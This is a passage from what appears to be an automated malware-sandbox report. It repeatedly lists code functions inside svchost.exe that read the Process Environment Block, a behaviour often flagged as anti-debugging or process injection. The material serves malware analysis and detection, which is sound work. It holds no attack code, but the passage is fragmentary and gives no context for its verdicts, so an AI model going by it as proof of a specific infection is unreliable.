Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h] -- 2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov ecx, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F0115 mov eax, dword ptr fs:[00000030h]2_2_036F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037061E5 mov eax, dword ptr fs:[00000030h]2_2_037061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036601F8 mov eax, dword ptr fs:[00000030h]2_2_036601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03670185 mov eax, dword ptr fs:[00000030h]2_2_03670185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365C073 mov eax, dword ptr fs:[00000030h]2_2_0365C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632050 mov eax, dword ptr fs:[00000030h]2_2_03632050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6050 mov eax, dword ptr fs:[00000030h]2_2_036B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A020 mov eax, dword ptr fs:[00000030h]2_2_0362A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C020 mov eax, dword ptr fs:[00000030h]2_2_0362C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6030 mov eax, dword ptr fs:[00000030h]2_2_036C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4000 mov ecx, dword ptr fs:[00000030h]2_2_036B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0362A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036380E9 mov eax, dword ptr fs:[00000030h]2_2_036380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B60E0 mov eax, dword ptr fs:[00000030h]2_2_036B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C0F0 mov eax, dword ptr fs:[00000030h]2_2_0362C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036720F0 mov ecx, dword ptr fs:[00000030h]2_2_036720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B20DE mov eax, dword ptr fs:[00000030h]2_2_036B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036280A0 mov eax, dword ptr fs:[00000030h]2_2_036280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C80A8 mov eax, dword ptr fs:[00000030h]2_2_036C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov eax, dword ptr fs:[00000030h]2_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov ecx, dword ptr fs:[00000030h]2_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363208A mov eax, dword ptr fs:[00000030h]2_2_0363208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638770 mov eax, dword ptr fs:[00000030h]2_2_03638770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov esi, dword ptr fs:[00000030h]2_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630750 mov eax, dword ptr fs:[00000030h]2_2_03630750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE75D mov eax, dword ptr fs:[00000030h]2_2_036BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4755 mov eax, dword ptr fs:[00000030h]2_2_036B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov ecx, dword ptr fs:[00000030h]2_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AC730 mov eax, dword ptr fs:[00000030h]2_2_036AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C700 mov eax, dword ptr fs:[00000030h]2_2_0366C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630710 mov eax, dword ptr fs:[00000030h]2_2_03630710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660710 mov eax, dword ptr fs:[00000030h]2_2_03660710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE7E1 mov eax, dword ptr fs:[00000030h]2_2_036BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363C7C0 mov eax, dword ptr fs:[00000030h]2_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B07C3 mov eax, dword ptr fs:[00000030h]2_2_036B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036307AF mov eax, dword ptr fs:[00000030h]2_2_036307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E47A0 mov eax, dword ptr fs:[00000030h]2_2_036E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D678E mov eax, dword ptr fs:[00000030h]2_2_036D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03662674 mov eax, dword ptr fs:[00000030h]2_2_03662674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364C640 mov eax, dword ptr fs:[00000030h]2_2_0364C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E627 mov eax, dword ptr fs:[00000030h]2_2_0364E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03666620 mov eax, dword ptr fs:[00000030h]2_2_03666620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668620 mov eax, dword ptr fs:[00000030h]2_2_03668620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363262C mov eax, dword ptr fs:[00000030h]2_2_0363262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE609 mov eax, dword ptr fs:[00000030h]2_2_036AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672619 mov eax, dword ptr fs:[00000030h]2_2_03672619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov eax, dword ptr fs:[00000030h]2_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C6A6 mov eax, dword ptr fs:[00000030h]2_2_0366C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036666B0 mov eax, dword ptr fs:[00000030h]2_2_036666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6500 mov eax, dword ptr fs:[00000030h]2_2_036C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036325E0 mov eax, dword ptr fs:[00000030h]2_2_036325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]2_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]2_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]2_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]2_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036365D0 mov eax, dword ptr fs:[00000030h]2_2_036365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]2_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]2_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]2_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]2_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632582 mov eax, dword ptr fs:[00000030h]2_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632582 mov ecx, dword ptr fs:[00000030h]2_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664588 mov eax, dword ptr fs:[00000030h]2_2_03664588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E59C mov eax, dword ptr fs:[00000030h]2_2_0366E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC460 mov ecx, dword ptr fs:[00000030h]2_2_036BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA456 mov eax, dword ptr fs:[00000030h]2_2_036EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362645D mov eax, dword ptr fs:[00000030h]2_2_0362645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365245A mov eax, dword ptr fs:[00000030h]2_2_0365245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C427 mov eax, dword ptr fs:[00000030h]2_2_0362C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A430 mov eax, dword ptr fs:[00000030h]2_2_0366A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036304E5 mov ecx, dword ptr fs:[00000030h]2_2_036304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036364AB mov eax, dword ptr fs:[00000030h]2_2_036364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036644B0 mov ecx, dword ptr fs:[00000030h]2_2_036644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BA4B0 mov eax, dword ptr fs:[00000030h]2_2_036BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA49A mov eax, dword ptr fs:[00000030h]2_2_036EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362CB7E mov eax, dword ptr fs:[00000030h]2_2_0362CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]2_2_036E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]2_2_036E4B4B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FAB40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D8B42 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03628B50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DEB50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03704B00 mov eax, dword ptr fs:[00000030h]
